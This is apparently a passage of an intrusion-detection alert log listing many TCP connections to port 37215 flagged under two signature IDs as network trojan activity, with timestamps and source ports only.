            Timestamp:05/28/24-09:57:20.850932
            SID:2835222
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341706
            SID:2835222
            Source Port:33626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920363
            SID:2835222
            Source Port:46926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937426
            SID:2829579
            Source Port:38944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559039
            SID:2835222
            Source Port:41124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002453
            SID:2829579
            Source Port:48938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067751
            SID:2829579
            Source Port:42916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985924
            SID:2829579
            Source Port:52474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.071264
            SID:2829579
            Source Port:50584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.776134
            SID:2835222
            Source Port:51644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938806
            SID:2835222
            Source Port:51746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542687
            SID:2835222
            Source Port:37020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706646
            SID:2835222
            Source Port:59326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745644
            SID:2829579
            Source Port:45520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018653
            SID:2829579
            Source Port:43928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872598
            SID:2835222
            Source Port:41880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.196318
            SID:2829579
            Source Port:52282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.594392
            SID:2829579
            Source Port:43324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543316
            SID:2835222
            Source Port:37988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858323
            SID:2829579
            Source Port:40534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989022
            SID:2829579
            Source Port:42216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556614
            SID:2829579
            Source Port:44740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714788
            SID:2835222
            Source Port:34402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767251
            SID:2829579
            Source Port:38850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842855
            SID:2835222
            Source Port:54766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321316
            SID:2835222
            Source Port:33356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435628
            SID:2829579
            Source Port:59848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.384775
            SID:2835222
            Source Port:35100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.550644
            SID:2835222
            Source Port:46042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882652
            SID:2835222
            Source Port:52632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989309
            SID:2835222
            Source Port:51684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811378
            SID:2835222
            Source Port:51286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826119
            SID:2835222
            Source Port:50714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919436
            SID:2835222
            Source Port:53914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805295
            SID:2829579
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309105
            SID:2835222
            Source Port:43256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691661
            SID:2829579
            Source Port:41114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938916
            SID:2835222
            Source Port:50110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392370
            SID:2829579
            Source Port:59788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922062
            SID:2835222
            Source Port:33512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047552
            SID:2829579
            Source Port:48938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969227
            SID:2835222
            Source Port:38178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040290
            SID:2829579
            Source Port:43852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047443
            SID:2829579
            Source Port:42730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827245
            SID:2829579
            Source Port:52294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870068
            SID:2835222
            Source Port:35260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755097
            SID:2829579
            Source Port:51766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260785
            SID:2829579
            Source Port:40152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935251
            SID:2829579
            Source Port:41112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.924147
            SID:2829579
            Source Port:33102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710419
            SID:2829579
            Source Port:52532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.509838
            SID:2829579
            Source Port:36338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858381
            SID:2835222
            Source Port:41362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821884
            SID:2835222
            Source Port:55604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048131
            SID:2829579
            Source Port:59680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766985
            SID:2835222
            Source Port:36084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.051223
            SID:2835222
            Source Port:53522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014484
            SID:2835222
            Source Port:56216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861362
            SID:2835222
            Source Port:41202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775661
            SID:2829579
            Source Port:46876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825533
            SID:2829579
            Source Port:42134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.773560
            SID:2835222
            Source Port:41558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.673229
            SID:2829579
            Source Port:48906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069036
            SID:2829579
            Source Port:57696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079274
            SID:2835222
            Source Port:36994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696288
            SID:2835222
            Source Port:36920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506233
            SID:2835222
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.091967
            SID:2829579
            Source Port:37040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336621
            SID:2835222
            Source Port:41090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414308
            SID:2829579
            Source Port:49856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605017
            SID:2835222
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635068
            SID:2829579
            Source Port:34880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723984
            SID:2835222
            Source Port:51872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059898
            SID:2835222
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729048
            SID:2835222
            Source Port:52280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507969
            SID:2829579
            Source Port:59188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808434
            SID:2829579
            Source Port:50504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440827
            SID:2829579
            Source Port:34242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881841
            SID:2829579
            Source Port:37400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687531
            SID:2835222
            Source Port:33466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926532
            SID:2835222
            Source Port:53648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.828746
            SID:2835222
            Source Port:55678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922380
            SID:2829579
            Source Port:53030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386707
            SID:2835222
            Source Port:59688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938142
            SID:2829579
            Source Port:47870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887467
            SID:2829579
            Source Port:36734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.580608
            SID:2835222
            Source Port:41912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919509
            SID:2829579
            Source Port:46960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319156
            SID:2835222
            Source Port:56406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559339
            SID:2835222
            Source Port:39042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029904
            SID:2829579
            Source Port:45712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880361
            SID:2829579
            Source Port:52380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067828
            SID:2835222
            Source Port:42734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358282
            SID:2835222
            Source Port:34694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753294
            SID:2835222
            Source Port:55310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930432
            SID:2829579
            Source Port:33338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731237
            SID:2835222
            Source Port:36284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899729
            SID:2835222
            Source Port:50732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.061359
            SID:2829579
            Source Port:34592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805659
            SID:2835222
            Source Port:40314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917718
            SID:2829579
            Source Port:36594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.004689
            SID:2835222
            Source Port:54366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752368
            SID:2829579
            Source Port:33800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811972
            SID:2835222
            Source Port:58808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060168
            SID:2829579
            Source Port:37124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827999
            SID:2835222
            Source Port:54158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855752
            SID:2835222
            Source Port:50720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550494
            SID:2829579
            Source Port:55966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.295687
            SID:2829579
            Source Port:38660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.037884
            SID:2829579
            Source Port:55776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.294161
            SID:2829579
            Source Port:56036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556561
            SID:2829579
            Source Port:44356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626271
            SID:2829579
            Source Port:43984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864140
            SID:2835222
            Source Port:51118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582216
            SID:2829579
            Source Port:57272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804584
            SID:2829579
            Source Port:38330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871094
            SID:2829579
            Source Port:39410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986781
            SID:2829579
            Source Port:37192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.461970
            SID:2835222
            Source Port:42758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056925
            SID:2835222
            Source Port:38174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307692
            SID:2829579
            Source Port:39524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804709
            SID:2835222
            Source Port:52518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654574
            SID:2829579
            Source Port:45226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809246
            SID:2835222
            Source Port:57014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882206
            SID:2835222
            Source Port:32774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928291
            SID:2835222
            Source Port:36382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821347
            SID:2835222
            Source Port:35164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994292
            SID:2835222
            Source Port:49634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760054
            SID:2829579
            Source Port:56516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.616468
            SID:2829579
            Source Port:58334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330922
            SID:2829579
            Source Port:37672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691596
            SID:2829579
            Source Port:38510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.588027
            SID:2829579
            Source Port:49802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276269
            SID:2835222
            Source Port:36764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927605
            SID:2835222
            Source Port:40206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350703
            SID:2835222
            Source Port:54124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.477576
            SID:2829579
            Source Port:38326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046136
            SID:2829579
            Source Port:32814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900550
            SID:2829579
            Source Port:52736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341234
            SID:2835222
            Source Port:34696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820814
            SID:2829579
            Source Port:45332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070322
            SID:2835222
            Source Port:50260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905463
            SID:2835222
            Source Port:45078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706785
            SID:2829579
            Source Port:60484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862213
            SID:2829579
            Source Port:47834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327726
            SID:2835222
            Source Port:57448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180811
            SID:2835222
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723941
            SID:2835222
            Source Port:35638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866468
            SID:2835222
            Source Port:39756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561600
            SID:2829579
            Source Port:41354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261670
            SID:2835222
            Source Port:39404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.616342
            SID:2835222
            Source Port:41100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051960
            SID:2835222
            Source Port:52864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760417
            SID:2829579
            Source Port:35306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771562
            SID:2829579
            Source Port:59144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771581
            SID:2835222
            Source Port:33786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919406
            SID:2829579
            Source Port:53994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440794
            SID:2835222
            Source Port:55794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832631
            SID:2829579
            Source Port:49632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572133
            SID:2829579
            Source Port:37200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841128
            SID:2829579
            Source Port:42450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665312
            SID:2835222
            Source Port:52410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926612
            SID:2829579
            Source Port:45558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818362
            SID:2835222
            Source Port:34160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.739052
            SID:2835222
            Source Port:60134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735926
            SID:2829579
            Source Port:39554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834505
            SID:2835222
            Source Port:35066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922221
            SID:2829579
            Source Port:49054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065883
            SID:2829579
            Source Port:55704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669895
            SID:2829579
            Source Port:59770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817452
            SID:2835222
            Source Port:51086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828257
            SID:2829579
            Source Port:36756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493052
            SID:2835222
            Source Port:45112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905708
            SID:2829579
            Source Port:52932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.308865
            SID:2829579
            Source Port:56510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.749868
            SID:2835222
            Source Port:60046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054341
            SID:2829579
            Source Port:45770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756513
            SID:2835222
            Source Port:56832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918855
            SID:2829579
            Source Port:54198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581956
            SID:2829579
            Source Port:55784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476010
            SID:2835222
            Source Port:49096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431029
            SID:2835222
            Source Port:56660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869801
            SID:2829579
            Source Port:56176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299961
            SID:2835222
            Source Port:52334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052565
            SID:2835222
            Source Port:37446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582840
            SID:2829579
            Source Port:46806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741936
            SID:2835222
            Source Port:40872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863453
            SID:2835222
            Source Port:45076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280019
            SID:2829579
            Source Port:38732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753199
            SID:2829579
            Source Port:56156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952771
            SID:2835222
            Source Port:56974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552791
            SID:2835222
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.454247
            SID:2835222
            Source Port:33114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858413
            SID:2829579
            Source Port:46888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073319
            SID:2829579
            Source Port:51200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841229
            SID:2829579
            Source Port:46668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414333
            SID:2829579
            Source Port:54610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.730173
